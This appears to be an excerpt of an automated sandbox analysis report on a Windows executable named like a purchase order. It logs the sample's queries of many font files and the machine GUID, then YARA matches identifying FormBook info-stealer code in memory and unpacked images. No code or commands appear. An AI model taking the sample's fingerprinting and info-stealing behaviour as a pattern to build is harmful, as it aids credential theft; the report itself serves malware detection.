Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Order No00020212910.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE
